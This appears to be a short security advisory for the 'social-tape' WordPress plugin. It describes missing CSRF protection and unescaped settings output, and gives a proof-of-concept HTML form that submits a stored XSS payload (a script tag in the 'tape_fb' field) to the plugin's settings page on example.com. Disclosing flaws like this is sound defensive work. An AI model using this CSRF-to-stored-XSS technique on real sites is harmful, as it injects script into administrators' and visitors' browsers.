The plugin does not have CSRF checks in place when saving its settings, and do not sanitise or escape them before outputting them back in the page, leading to a stored Cross-Site Scripting issue via a CSRF attack
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=social-tape/social_tape.php" method="POST">
<input type="hidden" name="oscimp_hidden" value="Y" />
<input type="hidden" name="tape_fb" value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="tape_tb" value="" />
<input type="hidden" name="tape_gp" value="" />
<input type="hidden" name="tape_da" value="" />
<input type="hidden" name="tape_tw" value="" />
<input type="hidden" name="tape_yt" value="" />
<input type="hidden" name="tape_ytlink" value="" />
<input type="hidden" name="Submit" value="Update Options" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>